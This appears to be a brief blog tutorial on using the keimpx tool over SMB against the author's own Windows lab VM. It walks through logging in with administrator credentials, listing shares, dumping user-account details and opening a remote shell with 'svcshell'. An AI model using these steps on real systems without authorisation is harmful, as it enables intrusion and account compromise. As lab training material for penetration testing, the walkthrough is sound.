keimpx

The keimpx is a tool, the knows how to view the users credentials at the target machine over the SMB. The keimpx actually know how to take these credentials through a share folders.

[LETS MAKE IS WORK]

#1) Open terminal & type:
assault@kalivm:~$ sudo keimpx -t 192.168.50.7 -U administrator -P try2hack
*The -t means target, the -U & P means username & password*

*We will get this output*

ke-1

*As you can see, it was an answer from the target*
*Let’s hit Y for yes*

*in that point, the keimpx will ask us: Which target do we wants to connect to? & he will show us the default user*

*Like this*

ke-2

*As you can see, we pressed 1 and 1 for the 2 questions*

#2) at the SMBShell type:
SMBShell (192.168.50.7:445) > shares

*And we will get this output*

ke-3

*In our case, the target’s OS is installed on E partition (we know that, because we’ve installed it over there)*

*Let’s chose*
[3] E (comment):
…….Path: E:\
…….Users: 0 (max: unlimited)

*In that point, let’s type*
SMBShell (192.168.50.7:445) > users

*And we will get this output*

Administrator
….User ID: 500
….Group ID: 513
….Enabled: True
….Logon count: 12
….Last Logon: Sun, 21 Aug 2016 11:06:58
….Last Logoff: Undefined
….Kickoff: Tue, 09 Feb 2016 16:57:49
….Last password set: Undefined
….Password can change: Tue, 09 Feb 2016 16:57:49
….Password must change: Infinity
….Bad password count: 0
….Logon hours: Unlimited
….Account Name: Administrator
….Description: Built-in account for administering the computer/domain
Admin0
….User ID: 1000
….Group ID: 513
….Enabled: True
….Logon count: 490
….Last Logon: Fri, 19 Aug 2016 18:49:32
….Last Logoff: Undefined
….Kickoff: Thu, 31 Dec 2015 00:00:05
….Last password set: Infinity
….Password can change: Thu, 31 Dec 2015 00:00:05
….Password must change: Infinity
….Bad password count: 0
….Logon hours: Unlimited
….Account Name: Admin0
Guest
….User ID: 501
….Group ID: 513
….Enabled: True
….Logon count: 1
….Last Logon: Sun, 24 Jan 2016 17:45:53
….Last Logoff: Undefined
….Kickoff: Sun, 24 Jan 2016 17:46:51
….Last password set: Undefined
….Password can change: Sun, 24 Jan 2016 17:46:51
….Password must change: Infinity
….Bad password count: 0
….Logon hours: Unlimited
….Account Name: Guest
….Description: Built-in account for guest access to the computer/domain
Jimmy
….User ID: 1002
….Group ID: 513
….Enabled: True
….Logon count: 1
….Last Logon: Sun, 24 Jan 2016 18:12:17
….Last Logoff: Undefined
….Kickoff: Sun, 24 Jan 2016 18:07:01
….Last password set: Undefined
….Password can change: Sun, 24 Jan 2016 18:07:01
….Password must change: Sun, 06 Mar 2016 18:07:01
….Bad password count: 0
….Logon hours: Unlimited
….Account Name: Jimmy
Tommi5000
….User ID: 1001
….Group ID: 513
….Enabled: True
….Logon count: 1
….Last Logon: Mon, 25 Jan 2016 12:37:11
….Last Logoff: Undefined
….Kickoff: Mon, 25 Jan 2016 12:36:13
….Last password set: Undefined
….Password can change: Mon, 25 Jan 2016 12:36:13
….Password must change: Mon, 07 Mar 2016 12:36:13
….Bad password count: 0
….Logon hours: Unlimited

*Let’s type this command*
SMBShell(192.168.50.7:445) > svcshell

*Check this out – we’ve access into the shell’s target*

ke-4

*Don’t forget to type: help for more commands inside keimpx*

 

ENJOY! 🙂

 

Here is an example by Gamer Forever